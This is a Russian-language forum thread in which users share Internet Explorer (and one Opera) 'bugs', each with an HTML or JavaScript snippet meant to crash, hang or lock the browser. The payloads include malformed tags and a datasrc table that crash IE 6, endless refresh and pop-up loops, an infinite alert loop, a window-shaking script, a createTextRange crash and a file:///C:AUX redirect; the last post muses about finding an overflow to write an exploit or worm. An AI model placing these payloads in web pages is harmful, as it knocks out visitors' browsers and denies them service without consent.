Я увидел что в знаменитом браузере Internet explorer сюществует полно багов, поэтому я подумал что это может быть не плохо если я открою топик в котором каждый будет описывать разные баги которые существуют в браузере Internet explorer . Правила публикации багов очень просты: 1. Расскажите немного про баг. 2. Кем был он найден. Я начинаю. Баг в IE 6 Этот баг позволяет сделать DoS (Denial of Service или Отказ от Обслуживания) атаку на IE 6 пока он не рухнет. Как я слышал он был найден командой FIRST. Код: Code: # <acronym><dd><h5><applet></caption></applet></h1> Или просто напишите это: Code: <table datasrc=".">
Вот еще один DoS. Был найден юзером jsz. Этот баг загружает браузер пока он не рухает. Код: Code: <meta http-equiv="refresh" content="0;url=mkmk.html"> <SCRIPT LANGUAGE="javascript"> <!-- window.open ('ms-ie.html') --> </SCRIPT>
<meta http-equiv='refresh' content='0; index.php'> бесконечный редирект страницы на самую себя. был найден мной. две минуты назад. я как раз зашёл сюда чтобы об этом написать
Вот сразу 3 бага для ослика. Кто нашел незнаю. Первый: Открывает множество окон HTML: <script> now(); function now() {for (i=1;i>0;i++){open('index.htm','new'+i);}} </script> Второй: Выводит сообщение ERROR и делает открытое окно недоступным HTML: <script> { while ( true ) window.alert('ERROR !'); } </script> Третий: трясет окно Обозревателя HTML: <body onloaD="MM_callJS('shake();')"> <script language="JavaScript1.2"> function shake() { n=100; for (i = 10; i > 0; i--) { for (j = n; j > 0; j--) { self.moveBy(0,i); self.moveBy(i,0); self.moveBy(0,-i); self.moveBy(-i,0); } } } function MM_callJS(jsStr) { file://v2.0 return eval(jsStr) } </script>
Eco[L]og так держать =) Я продолжаю. Этот баг был найден Stelian Ene и он работает в IE 6. Ксожелению я про него ничего не могу рассказать. Code: <input type="checkbox" id='c'> <script> r=document.getElementById("c"); a=r.createTextRange(); </script>
Бегущие полосы вешающите Ie Code: <HTML> <BODY> <SCRIPT> var color = new Array; color[1] = "black"; color[2] = "white"; for(x = 0; x <3; x++) { document.bgColor = color[x] if(x == 2){ x = 0; } } </SCRIPT> </BODY> </HTML> это только для IE А вот эта штука оперу вешает. Code: <script> parent.location="file:///C:AUX"; </script>
Народ, а не кто не копал дальше последнюю статью в ][ про новую уязвимость в ишаке? Там насколько я помню дело встало за написанием плагина к Ольке, чтобы откапать в каком именно месте идет переполнение, без этого ни экплоита ни червячка не напишешь. Это насколько я понимаю настоящая уязвимость.